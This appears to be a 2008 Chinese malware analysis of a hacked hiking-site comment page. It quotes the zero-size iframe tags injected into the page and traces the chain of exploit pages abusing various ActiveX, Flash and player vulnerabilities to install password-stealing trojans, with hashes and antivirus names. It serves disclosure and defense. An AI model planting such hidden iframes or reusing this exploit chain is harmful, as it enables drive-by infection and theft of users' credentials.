某中国户外资料网驴友评论页面挂马Trojan.PSW.Win32.GameOL.ojr等
endurer
2008-08-03 第1版
在Google梅里雪山的资料时,打开某中国户外资料网的驴友评论页面hxxp://www.*8***2*6**/comment/15267,瑞星提示:
病毒名称 处理结果 查杀方式 访问染毒文件的进程 文件
Trojan.DL.Script.JS.Agent.dn 清除成功 文件监控 D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/E8I5NP4S/fxx[1].htm
Trojan.DL.Script.JS.Agent.dn 直接跳过网页中的脚本网页监控 "D:/Program Files/Maxthon/Maxthon.exe" C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp
Trojan.DL.Script.JS.Agent.dn 直接跳过网页中的脚本网页监控 "D:/Program Files/Maxthon/Maxthon.exe" C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp
Trojan.DL.Script.JS.Agent.dn 清除成功 文件监控 D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/E8I5NP4S/fxx[2].htm
Trojan.DL.Script.JS.Agent.dn 直接跳过网页中的脚本网页监控 "D:/Program Files/Maxthon/Maxthon.exe" C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp
Trojan.DL.Script.JS.Agent.dn 直接跳过网页中的脚本网页监控 "D:/Program Files/Maxthon/Maxthon.exe" C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp
Trojan.DL.Script.JS.Agent.dn 清除成功 文件监控 D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/E8I5NP4S/fxx[3].htm
Trojan.DL.Script.JS.Agent.dn 清除成功 文件监控 D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/BLN0E2XG/fxx[1].htm
Trojan.DL.Script.JS.Agent.dn 清除成功 文件监控 D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/BLN0E2XG/fxx[2].htm
Trojan.DL.Script.JS.Agent.dn 直接跳过网页中的脚本网页监控 "D:/Program Files/Maxthon/Maxthon.exe" C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899208.tmp
检查网页代码,发现:
#1 hxxp://www.*8***2*6**/comment/15267
/---
<iframe src=hxxp://www.p**dh**0*/b3.htm width=50 height=0 border=0></iframe>
---/
#1.1 hxxp://www.p**dh**0*/b3.htm 包含代码:
/---
<Iframe src="hxxp://user1**.j*zm*01**/a3/fxx.htm" width=100 height=0></iframe>
<Iframe src="hxxp://j*zm*01**/fx.htm" width=100 height=0></iframe>
<Iframe src="hxxp://j*zm*01**/ac.htm" width=100 height=0></iframe>
---/
#1.1.1 hxxp://user1**.j*zm*01**/a3/fxx.htm 输出以下页面:
#1.1.1.1 hxxp://user1**.j*zm*01**/a3/ss.html
利用 Outlook Express的wab.exe的 MS Office Snapshot Viewer ActiveX ("snpvw.Snapshot Viewer Control.1")Exploit 漏洞 下载 hxxp://down**.h**s7**yu*/new/a3.css
文件说明符 : E:/test/a3.css
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:37:28
修改时间 : 2008-8-3 17:37:30
大小 : 24752 字节 24.176 KB
MD5 : 75d4e9b54a5c6f986c55d5a6f9b201b5
SHA1: 7D5DC946A99150FABE527DFB9DDC02E79A015B4D
CRC32: c501efe6
卡巴斯基报为:Trojan.Win32.Agent.wnu,瑞星报为:Trojan.PSW.Win32.GameOL.ojr
#1.1.1.2 利用 新浪DLoader Class ActiveX控件(clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A,Downloader.DLoader.1)任意文件下载漏洞下载 hxxp://down**.h**s7**yu*/down/sina.exe
文件说明符 : E:/test/sina.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:38:22
修改时间 : 2008-8-3 17:38:24
大小 : 24755 字节 24.179 KB
MD5 : f77c8813a1f339dc1d33e857698f3bad
SHA1: 250D9DA105EA3236965A1E61EB9665CB5444EAD7
CRC32: 88d6a14d
卡巴斯基报为:Trojan.Win32.Agent.wnu,瑞星报为:Trojan.PSW.Win32.GameOL.ojr
#1.1.1.3 hxxp://user1**.j*zm*01**/a3/ms06014.js
利用 ms06-014漏洞下载 hxxp://down**.h**s7**yu*/new/a3.css
#1.1.1.4
下载利用flash播放器(clsid:d27cdb6e-ae6d-11cf-96b8-444553540000,ShockwaveFlash.ShockwaveFlash.9)漏洞的文件hxxp://j*zm*01**/i115.swf,hxxp://j*zm*01**/f115.swf
文件说明符 : E:/test/i115.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 17:46:27
修改时间 : 2008-8-3 17:46:28
大小 : 1333 字节 1.309 KB
MD5 : e7a88a4f7675548abf33125340a4e1ef
SHA1: C520DC487D5A94E37D33C2DA495453FB69A6EDED
CRC32: 9c053649
卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a
文件说明符 : E:/test/f115.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 17:50:24
修改时间 : 2008-8-3 17:50:26
大小 : 1334 字节 1.310 KB
MD5 : 1b32c1a8689773858b3a3fa737ad81fd
SHA1: 20A1A4E9C0A8AED87F36D8989286A8C9E1BA7F29
CRC32: fe71dc31
卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a
#1.1.1.5
利用uusee(clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B,UUUPGRADE.UUUpgradeCtrl.1)漏洞
从 hxxp://down**.h**s7**yu*/down/ 下载 恶意程序文件
#1.1.1.6 hxxp://user1**.j*zm*01**/a3/GLWORLD.html (瑞星报为:Hack.Exploit.Script.JS.Bucode.c)
利用联众(clsid:61F5C358-60FB-4A23-A312-D2B556620F20,GLIEDown.IEDown.1)漏洞下载hxxp://down**.h**s7**yu*/new/a3.css
#1.1.1.7 hxxp://user1**.j*zm*01**/a3/real.js
利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载 hxxp://down**.h**s7**yu*/new/a3.css
#1.1.1.8 hxxp://user1**.j*zm*01**/a3/Real.html
利用RealPlayer(clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞下载 hxxp://down**.h**s7**yu*/new/a3.css
#1.1.1.9 利用百度工具条(BaiduBar.Tool)下载 hxxp://down**.h**s7**yu*/down/Baidu.cab,内含 ko.exe
文件说明符 : E:/test/Baidu.cab
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 17:53:8
修改时间 : 2008-8-3 17:53:10
大小 : 21503 字节 20.1023 KB
MD5 : 061d55e5a7c83c3811fe65e4a3b88001
SHA1: 95AF393F6B9541A735028A3A549E400E86A1E6AD
CRC32: f97b906a
文件说明符 : E:/test/ko.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:53:13
修改时间 : 2008-7-24 10:33:58
大小 : 21580 字节 21.76 KB
MD5 : 65447ffa08b8990d6a5887cb66e88a70
SHA1: 085CC23928087892EFB7314E3FDAE8325E0C1AB2
CRC32: ab4079ec
卡巴斯基报为:Trojan-Downloader.Win32.Agent.wps,瑞星报为:Trojan.DL.Win32.Game.a
#1.1.1.10 hxxp://user1**.j*zm*01**/a3/Thunder.html
利用迅雷(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F,DPClient.Vod)漏洞下载 hxxp://down**.h**s7**yu*/new/a3.css
#1.1.2 hxxp://j*zm*01**/fx.htm
输出以下页面:
#1.1.2.1 hxxp://j*zm*01**/ilink.html
检测IE浏览器上的flash播放器版本并相应的下载 i115.swf、i64.swf、i47.swf、i45.swf、i28.swf、i16.swf
文件说明符 : E:/test/i16.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1332 字节 1.308 KB
MD5 : 715ba3cc3518d13f18be330b49686f30
SHA1: 239CBBC9AFC14F424908BEA404323D4A96D70B94
CRC32: 4ef344da
卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a
文件说明符 : E:/test/i28.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1332 字节 1.308 KB
MD5 : c2ec382f6711b90d258131658299e8a3
SHA1: A48172942113B3AA6244668993C3D6C91E72905F
CRC32: 0afad039
卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a
文件说明符 : E:/test/i45.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1333 字节 1.309 KB
MD5 : 1fdcf9004348fc6da39f2c04faad662d
SHA1: D459EB5540460864AB8E96B3F12FA85AC2B6FA45
CRC32: 1a3da06f
卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a
i47.swf 同 i45.swf
文件说明符 : E:/test/i64.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1333 字节 1.309 KB
MD5 : 248d65b4639237f2cc97db3c910629e0
SHA1: 261278838940FD189BD315CF5C839D22DA17FDE1
CRC32: ab1f0d37
卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a
#1.1.2.2 hxxp://j*zm*01**/ilink.html
检测FireFox浏览器上的flash播放器版本并相应的下载 i115.swf、i64.swf、i47.swf、i45.swf、i28.swf、i16.swf
#1.1.3 hxxp://j*zm*01**/ac.htm
利用 Outlook Express的wab.exe的MS Office Snapshot Viewer ActiveX ("snpvw.Snapshot Viewer Control.1")Exploit 漏洞 下载 hxxp://down**.h**s7**yu*/down/ac.css
文件说明符 : E:/test/ac.css
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:57:9
修改时间 : 2008-8-3 17:57:10
大小 : 24757 字节 24.181 KB
MD5 : 96ba09e9d83d39594e4d0b4e6721b982
SHA1: 4C213C156617BC8E9B919AA1904ADE7C7D9CB749
CRC32: f29acf04
卡巴斯基报为:Trojan.Win32.Agent.wnu,瑞星报为:Trojan.PSW.Win32.GameOL.ojr